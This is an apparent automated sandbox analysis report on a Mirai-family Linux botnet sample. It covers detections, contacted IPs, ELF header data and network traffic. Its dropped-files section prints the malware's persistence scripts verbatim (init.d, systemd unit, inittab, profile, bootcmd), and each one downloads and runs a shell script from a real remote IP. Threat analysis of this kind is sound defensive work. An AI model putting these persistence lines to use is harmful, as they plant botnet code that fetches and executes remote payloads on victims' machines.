Source: Yara match	File source: 6249.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6249, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
m68k.nn.elf	34%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi	m68k.nn.elf	false	high
http://193.143.1.70/curl.sh	m68k.nn.elf	false	high
http://193.143.1.70/lol.sh	m68k.nn.elf	false	high
http://193.143.1.70/	m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, m68k.nn.elf.42.dr, bootcmd.12.dr, custom.service.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.216.19.139	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.216.19.139	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	kj5f8keqNK.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	Satan.x86.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	Satan.x86.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Satan.x86.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Satan.x86.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	jzyKEkkDsV.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	1732341065aa3050236bf0a757080986a42d53699fd38d78c31f65f12b4934c9236ce70a12688.dat-decoded.exe	Get hash	malicious	XenoRAT	Browse	154.216.17.204
	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	154.216.17.204
	1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exe	Get hash	malicious	Remcos	Browse	154.216.17.204
	17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exe	Get hash	malicious	Remcos	Browse	154.216.17.204
	17323410673807b67d8bb6f66f1d676167634fbe15d4743d1d486ea52ce68855c1615ccc44621.dat-decoded.exe	Get hash	malicious	Remcos	Browse	154.216.17.204
	1732341065aa3050236bf0a757080986a42d53699fd38d78c31f65f12b4934c9236ce70a12688.dat-decoded.exe	Get hash	malicious	XenoRAT	Browse	154.216.17.204
	test1.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	https://clearview-ps.inwise.net/Page_11-21-2024_1	Get hash	malicious	HTMLPhisher	Browse	154.216.17.193
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.139
INIT7CH	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Satan.arm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Satan.x86.elf	Get hash	malicious	Unknown	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/m68k.nn.elf	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/system	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/rc.local	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.648756146188875
Encrypted:	false
SSDEEP:	3:KPJRXSC/ANFDDoC6WgrbkILbaaFOdFXa5O:WJRlufonWgrZbaaeXCO
MD5:	D92F5E8E17BDB4502DE149B09746D400
SHA1:	D56B28286B13518769A4B27555F875EE4B36DB56
SHA-256:	5C90BE50A0DDA68C384B3B56B21DB30C1F0CCF9E00A13D90421EA0E436A7E61F
SHA-512:	5F1ED84FB5089CD017B0907A55C97F12951EE500E8C8A1A357027701C2EC4EE26430DF4A623068D7D04BD6802C12F8E4F58281736C38986398DBA8325BE4884B
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/m68k.nn.elf && wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/m68k.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.586399031280707
Encrypted:	false
SSDEEP:	12:QRkiMEXNxl8RUJgjvMHK2FSuKN+dRRucSOyd3:vRWISzhYOM3
MD5:	14CB06C643C4DCA73B64B23284CF2763
SHA1:	96993D1DCEA6A6F005F554569CD1C8AAFB08FBBB
SHA-256:	3AADC3766DB7E7F284DE0497F08BD2B1772B123C537BA087DD7DA7C37919E023
SHA-512:	63ABD56C1C266B0EB8D98C3FD47FB88FD09A37DFDD67C4A59EC679C43BAF987D961D3B60FF338F0D069B89DC2600628AC0814D7890F891B62487AB6CD0072E89
Malicious:	true
Joe Sandbox View:	Filename: m68k.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/m68k.nn.elf..case "" in. start). echo 'Starting m68k.nn.elf'. /tmp/m68k.nn.elf &. wget http://193.143.1.70/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping m68k.nn.elf'. killall m68k.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	105
Entropy (8bit):	4.649400035181374
Encrypted:	false
SSDEEP:	3:TKH4vZKSC/ANFDvSDRFXWgrbkILpaKB0dFLoKE0:h8luzSXXWgrZzBeLXE0
MD5:	E6A67B96787FC1B6EDA521646D9920CD
SHA1:	E59A352E76F3C709F37C670AE2E4EEAF337CB5A9
SHA-256:	5D4E84611ADE58BDFABC1E3D137026054CB5744D1BD224BFBAF1B10E46E8404C
SHA-512:	D388E666B0D683949626DBBA7E050F1D8125BE5C57419F6F53DECA19CB1B64DCB94E3097C96C430B28E9FEB71F3C5D4264264C667EC2961479F2B3C4C116447A
Malicious:	true
Joe Sandbox View:	Filename: m68k.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/m68k.nn.elf &.wget http://193.143.1.70/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.601231599772524
Encrypted:	false
SSDEEP:	3:nAWu58C/ANFDDoC6WgrbkILbaaFOdFXa5O:ANufonWgrZbaaeXCO
MD5:	CFCDBD3AA5CBD4171FCD40080EB52E47
SHA1:	406C8A608D611B3F6BBBE624935CFE4A5186347B
SHA-256:	C06E2679C4765D701B03A76E0010DBA34BC6A2A7E30E6402B8BA6FFFCED6C4DB
SHA-512:	80BE4C753C7DCE271CD755AC931582BAC2C4DAA4EC57AC598A9E647743BD514B17F2A239629A2BA89A2BF46F10ED7E88D58212B504ABAAB42340E3D7DC73F43D
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/m68k.nn.elf && wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.488319695814355
Encrypted:	false
SSDEEP:	3:TgSC/ANFDvSDRFXWgrbkILbaaFOdFXa50:TgluzSXXWgrZbaaeXC0
MD5:	F20A89BA494D443C4631AF3C5DCAAE36
SHA1:	9DF4F458CF5AB8D30516106C240EA2776946DDBA
SHA-256:	F5BFC66DC714E549923EDE002A8BB3358537F264A1080B4827742E6582FBACDA
SHA-512:	D83F142FF3C3EB9C8938719364A0F09D15BAFAFD1EDE2D4B0CD92FC093DB8F9A7FC03DFA1643C731D3444A4B5D0E153C6B0521AE7C55A83A01EE6B88621286A8
Malicious:	true
Preview:	/tmp/m68k.nn.elf &.wget http://193.143.1.70/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/m68k.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: arm7.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.065814119373622
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+xE02+GWRdCWgrL+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdk+GWRXY+GWRuL6
MD5:	BF3F0CC70BF8D3E32BBFBE3CEDC43163
SHA1:	CB741181853423039BE639E8900AFAD415D517CD
SHA-256:	EA1D8F5173116929B42FEAFD9E4B3B101BB39BCDAF3F27FD36F6AE1EF00D1D4C
SHA-512:	7D82E155B2AB39303D56A07479EE85766C0A9A40A93DCA33674E51590DEF92088C84EA39E82E13551719E6FFE40867715AF36B907735A9CDDAEE17A71B26A77D
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/m68k.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://193.143.1.70/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/user/127/dconf/user

Download File

Process:	/usr/libexec/gsd-housekeeping
File Type:	Unknown
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

/tmp/qemu-open.bKy4Gs (deleted)

Download File

Process:	/tmp/m68k.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.6168746059562227
Encrypted:	false
SSDEEP:	3:TgSC/ANln:TglOn
MD5:	CF5BFD6A623ECC046218AA0EBA4D8FE7
SHA1:	E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
SHA-256:	C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
SHA-512:	F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
Malicious:	false
Preview:	/tmp/m68k.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.4226766178768475
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	m68k.nn.elf
File size:	116'864 bytes
MD5:	759a1312ba421c777a634fce61723fb6
SHA1:	b4db9fe0f55f3f544244d0f501b9b16e8ac56cab
SHA256:	4f5a17ee5195066461ba2eef56ed5a59a168ef57b479bbc068809ddba35cc35a
SHA512:	b43e9d4c1398b4b29179e3b570585d9df0f8687946cff6f41ae628e7e926cf61b430fbef891b119a6f2cf7826cc47cd8fe481c1597d49c93e938aeeaa7f169ce
SSDEEP:	3072:g+7WENG+eXvvfsi7fYtz1bd5doz5ST1ybevwcKO3kf8ApV:g+7W8guybapKGk0oV
TLSH:	11B34BC6B400C9BEFC1ED67B642B0B19B530A3516F520B27A25BFE63ADB11D44D1BE81
File Content Preview:	.ELF.......................D...4.........4. ...(.................................. .......................($...... .dt.Q............................NV..a....da....LN^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	116464
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0x18f76	0x0	0x6	AX	4
.fini	PROGBITS	0x8001901e	0x1901e	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x8001902c	0x1902c	0x30b8	0x0	0x2	A	2
.ctors	PROGBITS	0x8001e0e8	0x1c0e8	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8001e0f0	0x1c0f0	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8001e0fc	0x1c0fc	0x5b4	0x0	0x3	WA	4
.bss	NOBITS	0x8001e6b0	0x1c6b0	0x225c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x1c6b0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x1c0e4	0x1c0e4	6.4338	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x1c0e8	0x8001e0e8	0x8001e0e8	0x5c8	0x2824	5.0372	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 04:17:53.730153084 CET	43928	443	192.168.2.23	91.189.91.42
Nov 24, 2024 04:17:54.563249111 CET	38978	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.683028936 CET	199	38978	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.683243036 CET	38978	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.685882092 CET	38978	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.687372923 CET	38978	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.690350056 CET	38980	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.805389881 CET	199	38978	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.810401917 CET	199	38980	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.810481071 CET	38980	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.814841986 CET	38980	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.815388918 CET	38980	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.820503950 CET	38982	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.851922035 CET	199	38978	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.934726954 CET	199	38980	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.940006971 CET	199	38982	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:54.940073967 CET	38982	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.941404104 CET	38982	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.942174911 CET	38982	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.949842930 CET	38984	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:54.975817919 CET	199	38980	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.061204910 CET	199	38982	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.069391012 CET	199	38984	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.069458961 CET	38984	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.073369026 CET	38984	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.078182936 CET	38984	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.086337090 CET	38986	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.103852034 CET	199	38982	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.192869902 CET	199	38984	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.205884933 CET	199	38986	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.205945969 CET	38986	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.212584019 CET	38986	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.217019081 CET	38986	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.239804983 CET	199	38984	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.250385046 CET	38988	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.332148075 CET	199	38986	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.369929075 CET	199	38988	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.370042086 CET	38988	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.379810095 CET	199	38986	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.426584959 CET	38988	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.430774927 CET	38988	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.438282013 CET	38990	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.546129942 CET	199	38988	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.558537006 CET	199	38990	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.558604956 CET	38990	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.563209057 CET	38990	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.564500093 CET	38990	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.591844082 CET	199	38988	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.604469061 CET	38992	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.682740927 CET	199	38990	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.724050999 CET	199	38992	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.724138975 CET	38992	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.727596998 CET	38992	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.727854013 CET	199	38990	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.729433060 CET	38992	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.734533072 CET	38994	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.847121000 CET	199	38992	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.854055882 CET	199	38994	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.854243040 CET	38994	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.891796112 CET	199	38992	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:55.931174040 CET	38994	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:55.936506987 CET	38994	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:56.050759077 CET	199	38994	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:56.099987984 CET	199	38994	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:56.940459967 CET	199	38978	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:56.940553904 CET	38978	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.092042923 CET	199	38980	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.092118979 CET	38980	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.222630978 CET	199	38982	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.222709894 CET	38982	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.331985950 CET	199	38984	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.332055092 CET	38984	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.472743034 CET	199	38986	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.472800016 CET	38986	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.643697023 CET	199	38988	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.643755913 CET	38988	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.816514969 CET	199	38990	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:57.816565990 CET	38990	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:57.980897903 CET	199	38992	154.216.19.139	192.168.2.23
